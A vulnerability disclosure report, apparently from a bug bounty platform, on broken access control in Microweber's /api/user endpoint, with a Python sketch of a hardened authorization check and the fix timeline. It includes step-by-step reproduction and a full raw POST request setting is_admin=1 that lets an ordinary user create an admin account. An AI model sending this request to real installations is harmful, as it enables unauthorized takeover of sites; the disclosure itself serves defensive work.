Broken Access Control on "http://localhost/api/user" endpoint in microweber/microweber

Valid

Reported on

Mar 16th 2023


Description

A normal user account can create an admin account.

Steps

1. Navigate to https://localhost/.

2. Click Login, then Register, fill in the form and click Register.

3. Log in with the newly created user account while intercepting the traffic in Burp.

4. Turn Burp Intercept on, refresh the page and copy the laravel_session value from the Cookie header.

5. Send the POST request below with the copied user laravel_session.

POST /api/user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/admin/view:modules/load_module:users/edit-user:0
Cookie: laravel_session=XDkQKNuW---Qs22;

thumbnail=&id=0&username=testaccount&password=testaccount&verify_password=testaccount&first_name=testaccount&last_name=testaccount&email=testaccount%40test.com&phone=&is_admin=1&is_active=1&basic_mode=0&api_key=

6. The response is 201 Created: the new admin account has been created.

7. You can now log in at http://localhost/admin/login as an admin user with the credentials sent in the POST request.

Video-PoC

https://drive.google.com/file/d/1xBuvOjIGU6W5Q5xx-HqQ0TwzYDEcUubD/view?usp=sharing

Impact

A normal user account on the website can create an admin account, giving that user all of an admin's privileges and access to all sensitive data.
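The missing check is server-side authorization on the user write endpoint: the session only proves the caller is logged in, not that they may create accounts or set is_admin. The following is an added illustration, not Microweber's code, of the pre-fix decision beside a hardened one; the Session class, the field names treated as privileged and the helper names are assumptions, and the form body is the one from the report above.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed sample: the form body from the report, decoded by parse_form().
REPORT_BODY = ("thumbnail=&id=0&username=testaccount&password=testaccount"
               "&verify_password=testaccount&first_name=testaccount"
               "&last_name=testaccount&email=testaccount%40test.com&phone="
               "&is_admin=1&is_active=1&basic_mode=0&api_key=")

# Assumption: these fields grant or change privilege, so only an admin may set them.
PRIVILEGED_FIELDS = {"is_admin", "is_active", "api_key"}


@dataclass
class Session:
    user_id: int   # hypothetical: id of the account behind laravel_session
    is_admin: bool


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body to single string values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def check_user_write_vulnerable(session: Session, form: dict) -> tuple[bool, str]:
    """Shape of the bug: being logged in is the only requirement, so id=0
    (create) together with is_admin=1 from an ordinary account is accepted."""
    return True, "saved all submitted fields"


def check_user_write(session: Session, form: dict) -> tuple[bool, str]:
    """Hardened decision: creating accounts, editing other users and setting
    privileged fields all require an admin session; an ordinary user may only
    edit its own record, and privileged fields it sends are rejected outright
    rather than silently dropped, so the attempt is visible in logs."""
    target_id = int(form.get("id") or 0)           # id=0 means "create"
    if session.is_admin:
        return True, "admin may create or edit any user"
    if target_id == 0:
        return False, "account creation requires an admin session"
    if target_id != session.user_id:
        return False, "users may only edit their own record"
    sent = sorted(PRIVILEGED_FIELDS & set(form))
    if sent:
        return False, f"privileged fields require an admin session: {sent}"
    return True, "self-edit of non-privileged fields"
```

Wiring the hardened check in front of the handler turns the report's request into a 403 with a reason that is worth alerting on, since a non-admin session submitting is_admin=1 is not normal application behaviour.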

Timeline

We are processing your report and will contact the microweber team within 24 hours. (9 months ago)
cyberneticsplus modified the report. (9 months ago)
We have contacted a member of the microweber team and are waiting to hear back. (8 months ago)
Peter Ivanov modified the severity from Critical (9.8) to High (8.8). (8 months ago)
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability. (8 months ago)
cyberneticsplus has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.3.4 with commit f43d5b. (8 months ago)
Peter Ivanov has been awarded the fix bounty.
This vulnerability has been assigned a CVE.
This vulnerability is scheduled to go public on Apr 22nd 2023.
Peter Ivanov published this vulnerability. (7 months ago)